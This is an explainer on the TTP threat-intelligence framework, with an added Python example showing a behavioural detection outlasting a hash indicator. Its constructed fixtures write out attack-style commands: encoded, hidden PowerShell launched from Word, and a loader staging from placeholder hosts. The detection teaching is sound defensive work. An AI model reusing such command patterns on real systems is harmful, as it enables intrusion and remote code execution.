Cybersecurity framework that breaks down how attackers operate into three distinct levels. Security teams adopted this from military intelligence because it works better than traditional IOC-based approaches for understanding adversary behavior.
What does TTP stand for?
Tactics, Techniques, and Procedures – three levels of detail about what threat actors do during campaigns.
Framework Breakdown
- Tactics cover the big-picture goals attackers have during different attack phases. Things like getting initial access, staying persistent, moving around networks, and stealing data. These don't really change much between campaigns from the same threat group.
- Techniques are the specific methods they use to hit those goals. Spear-phishing for getting in, PowerShell abuse for staying hidden, credential dumping for privilege escalation. Security researchers have cataloged hundreds of these now.
- Procedures go deep: the exact tools used, the specific commands run, how the malware is configured. This level varies the most between groups and changes frequently.
Why are TTPs important in cybersecurity?
Traditional indicators burn out fast. Attackers switch IP addresses and malware constantly, but their operational habits stick around much longer. The same group will often follow similar attack patterns even when everything else changes.
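The following is an added example, not code from the original page. It puts the three-level breakdown above and the "indicators burn out" argument side by side: two constructed sets of process-creation events describe the same tradecraft, but the second campaign ships a rebuilt loader (new hash) and a new staging domain. A hash-based indicator from the first campaign's report stops matching; a behavioural rule that looks for an Office application spawning PowerShell with an encoded command keeps matching, and each hit is recorded as tactic / technique / procedure. The event format, hashes and hostnames are constructed placeholders; T1059.001 and the "Execution" tactic are real MITRE ATT&CK identifiers, while the matching logic is this example's own and is deliberately narrow.

```python
"""Added example: a behavioural (TTP) detection outliving a hash-based (IOC) match.

All events, hashes and hostnames below are constructed for illustration.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent: str   # image name of the parent process
    image: str    # image name of the created process
    cmdline: str  # full command line of the created process
    sha256: str   # placeholder hash of the created image (constructed, not a real sample)


# Campaign A: malicious document -> encoded PowerShell -> loader (hash "hash-loader-v1").
CAMPAIGN_A = [
    ProcessEvent("explorer.exe", "winword.exe", 'WINWORD.EXE "C:\\Users\\a\\invoice.docm"', "hash-word"),
    ProcessEvent("winword.exe", "powershell.exe", "powershell.exe -nop -w hidden -enc QUJDREVG", "hash-ps"),
    ProcessEvent("powershell.exe", "loader.exe", "loader.exe --stage http://old-staging.example/", "hash-loader-v1"),
]

# Campaign B: same procedure, but the loader was rebuilt (new hash) and the staging host changed.
CAMPAIGN_B = [
    ProcessEvent("explorer.exe", "winword.exe", 'WINWORD.EXE "C:\\Users\\b\\quote.docm"', "hash-word"),
    ProcessEvent("winword.exe", "powershell.exe", "powershell.exe -w hidden -EncodedCommand QUJDREVG", "hash-ps"),
    ProcessEvent("powershell.exe", "loader.exe", "loader.exe --stage http://new-staging.example/", "hash-loader-v2"),
]

# Indicator published after campaign A (constructed value).
KNOWN_BAD_HASHES = {"hash-loader-v1"}

# Office applications whose child processes should not normally be an interpreter.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def ioc_hits(events, bad_hashes=KNOWN_BAD_HASHES):
    """Indicator-level detection: exact match on a known-bad file hash."""
    return [e for e in events if e.sha256 in bad_hashes]


def _has_encoded_command(cmdline):
    """True if a token is a PowerShell encoded-command switch.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (e.g. -e, -enc) and
    the alias -ec, so the check is prefix-based rather than a fixed string.
    """
    for tok in cmdline.split():
        if not tok.startswith("-") or len(tok) < 2:
            continue
        name = tok[1:].lower()
        if name == "ec" or "encodedcommand".startswith(name):
            return True
    return False


def ttp_hits(events):
    """Behaviour-level detection, reported at all three levels of the TTP breakdown."""
    hits = []
    for e in events:
        if e.image.lower() in ("powershell.exe", "pwsh.exe") and _has_encoded_command(e.cmdline):
            if e.parent.lower() in OFFICE_APPS:
                hits.append({
                    "tactic": "Execution",                      # what the adversary is trying to achieve
                    "technique": "T1059.001",                   # ATT&CK: Command and Scripting Interpreter: PowerShell
                    "procedure": f"{e.parent} -> {e.cmdline}",  # the concrete, observed implementation
                })
    return hits


def compare(events):
    """Count how each detection style fares against one campaign's events."""
    return {"ioc": len(ioc_hits(events)), "ttp": len(ttp_hits(events))}


if __name__ == "__main__":
    for name, events in (("campaign A", CAMPAIGN_A), ("campaign B", CAMPAIGN_B)):
        print(name, compare(events))
```

Running the module shows the IOC count dropping from 1 to 0 between the campaigns while the behavioural rule fires in both, and the recorded procedure differs between the two hits even though tactic and technique are identical. The rule is intentionally narrow (Office parent plus encoded PowerShell) so that it stays readable; a production detection would add exclusions for legitimate automation that uses encoded commands.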
How are TTPs used in threat intelligence?
Analysts map out how specific threat groups work so they can spot them again. During incidents, knowing a group’s usual playbook helps predict what they’ll do next and where to focus response efforts.
What frameworks are commonly used to categorize TTPs?
- MITRE ATT&CK: Most widely used framework. Maps real attack techniques with regular updates as new methods get discovered.
- Cyber Kill Chain: Seven-phase model from Lockheed Martin. Still popular for understanding attack flow.
- Diamond Model: Looks at connections between adversaries, capabilities, infrastructure, and victims. Good for linking related incidents.